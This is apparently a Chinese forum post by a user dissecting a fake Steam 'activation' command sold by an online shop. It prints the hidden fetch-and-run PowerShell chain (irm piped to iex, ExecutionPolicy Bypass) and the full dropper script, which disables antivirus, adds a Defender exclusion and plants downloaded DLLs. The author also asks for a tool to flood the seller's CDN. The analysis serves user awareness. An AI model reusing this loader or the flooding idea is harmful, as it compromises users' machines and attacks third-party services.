共计 230 个字符,预计需要花费 1 分钟才能阅读完成。
pdd 店家假激活要求输入这个命令
irm steam.*** | iex
尝试浏览器直接访问这个 steam 网站,直接跳转到了真 steam 思路错误 然后把管道符号 | 去掉 发现拉去的还是 html,发现有些不对,于是把
irm steam.***
的玩意全部一股脑扔进 vscode 然后折叠 html 发现了这个玩意
#>
irm steam.***/pwsDwFile/new -OutFile x.ps1
powershell.exe -ExecutionPolicy Bypass -File x.ps1;
<#
使用 powershell 绕过执行策略的限制
这里我最开始没发现问题,看了半天 html 都快傻眼了,代码还能混淆进 html?最后反向思考肯定得用 powershell 才能执行接下来的脚本,于是搜搜 powershell 关键字给我找出来上面那两玩意,前面那句居然是藏在 html 里面的,后面那句没有隐藏,vscode 折叠一下就看见 powershell 了
继续跟进 x.ps1
cls
$filePathToDelete = Join-Path $env:USERPROFILE "x.ps1"
if (Test-Path $filePathToDelete) {Remove-Item -Path $filePathToDelete}
$desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1"
if (Test-Path $desktopFilePathToDelete) {Remove-Item -Path $desktopFilePathToDelete}
把自己删了
$steamRegPath = 'HKCU:SoftwareValveSteam'
搜搜 steam
$localPath = -join ($env:LOCALAPPDATA,"SteamActive")
if ((Test-Path $steamRegPath)) {
$properties = Get-ItemProperty -Path $steamRegPath
if ($properties.PSObject.Properties.Name -contains 'SteamPath') {$steamPath = $properties.SteamPath}
}
让用户关掉授权
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {Write-Host "[请重新打开 Power shell 打开方式以管理员身份运行]" -ForegroundColor:red
exit
}
function PwStart() {if(Get-Process "360Tray*" -ErrorAction Stop){while(Get-Process 360Tray* -ErrorAction Stop){Write-Host "[请先退出 360 安全卫士]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
if(Get-Process "360sd*" -ErrorAction Stop)
{while(Get-Process 360sd* -ErrorAction Stop){Write-Host "[请先退出 360 杀毒]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
这句话很奇怪,实际上虚拟机里面没有 steam 并没有执行?
if ($steamPath -eq ""){Write-Host "[请检查您的 Steam 是否正确安装]" -ForegroundColor:Red
exit
}
关掉 steam
Write-Host "[ServerStart OK]" -ForegroundColor:green
Stop-Process -Name steam* -Force -ErrorAction Stop
Start-Sleep 2
if(Get-Process steam* -ErrorAction Stop){
TASKKILL /F /IM "steam.exe" | Out-Null
Start-Sleep 2
}
if (!(Test-Path $localPath)) {
md $localPath | Out-Null
if (!(Test-Path $localPath)) {New-Item $localPath -ItemType directory -Force | Out-Null}
}
$catchPath = -join ($steamPath,"packagedata")
if ((Test-Path $catchPath)) {if ((Test-Path $catchPath)) {Remove-Item $catchPath -Recurse -Force | Out-Null}
}
添加免杀
try{
Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
Start-Sleep 3
}catch{}
Write-Host "[Result->0 OK]" -ForegroundColor:green
删掉其他家的 dll?
try{
$d = $steamPath + "/version.dll"
if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件}
$d = $steamPath + "/user32.dll"
if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件}
$d = $steamPath + "/hid.dll"
if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件}
}catch{Write-Host "[异常残留请检查 [$d] 文件是否异常!]" -ForegroundColor:red
exit
}
下 pdf 假装?话说老哥们有啥可以刷网络的工具么,其实我有点想刷上一波把他 cdn 刷干净,但是限速 2m 并且单 ip 限 1 个线程
$downloadData = "http://steam.***/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf"
$downloadLink = "http://steam.***/pwsDwFile/9b96dab2bb0ba18d56068fabc5b17185.pdf"
irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
Write-Host "[Result->1 OK]" -ForegroundColor:green
$d = $localPath + "/hid"
irm -Uri $downloadData -OutFile $d -ErrorAction Stop
Write-Host "[Result->2 OK]" -ForegroundColor:green
Start-Sleep 1
重新打开 steam
Start steam://
Write-Host "[连接服务器成功请在 Steam 输入激活码 3 秒后自动关闭]" -ForegroundColor:green
Start-Sleep 3
exit
|
}
整体看下来就是给 steam 添加了两个文件,可是看起来并没有进行注入什么的啊,我理解就需要 dll 时候是先拉文件目录内的 dll 进行执行?这样才能解释为啥就是只添加了两个文件?
正文完
